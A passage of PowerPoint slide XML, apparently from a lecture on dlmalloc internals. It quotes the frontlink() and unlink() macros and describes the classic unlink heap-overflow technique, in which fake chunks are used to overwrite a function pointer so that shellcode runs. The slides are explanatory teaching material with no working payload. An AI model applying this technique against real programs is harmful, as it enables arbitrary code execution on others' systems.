                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>     		  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	     	  BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1502593857"/>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59844" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Handling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059845" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The macro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is responsible for inserting entries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used to insert entry P with its pointers FD and BK into bin IDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>frontlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, P, S, IDX, BK, FD) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  IDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(S); // Finds the index of a bin given the chunk size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  BK = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bin_at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Extract head pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (FD == BK) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mark_binblock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(A, IDX); // Mark bin as not empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  else{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    while (FD != BK &amp;&amp; S &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>chunksize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(FD) ){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>      FD = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    BK = FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = P; 		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="917596209"/>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61896" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1061897" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A heap overflow modifies in-memory management tags to trick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into overwriting addresses chosen by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite an arbitrary memory position with arbitrary integer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite address stored in FD + 12 (offset of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) with BK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>FD-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = BK; // *(P-&gt;fd+12) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = FD; // *(P-&gt;bk+8) = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overwrite a function pointer with address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When function is later invoked, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is executed instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1590028016"/>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84418" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable program allocates two adjacent memory chunks, named X and Y</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When chunk X is overflowed, two fake (free) chunks are created over Y, called W and Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When X is freed, it will be merged with W  and the unlink() macro will be called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since W and Z are under the attacker’s control, arbitrary values can be specified </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="666379088"/>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85442" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unlink()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="21717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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="24003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size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085446" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2628900"/>
            <a:ext cx="2362200" cy="6858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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085447" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="33147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prev_size (not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085448" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="35433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size, PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085452" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3771900"/>
            <a:ext cx="2362200" cy="19431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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085454" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2571751"/>
            <a:ext cx="745066" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1085460" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
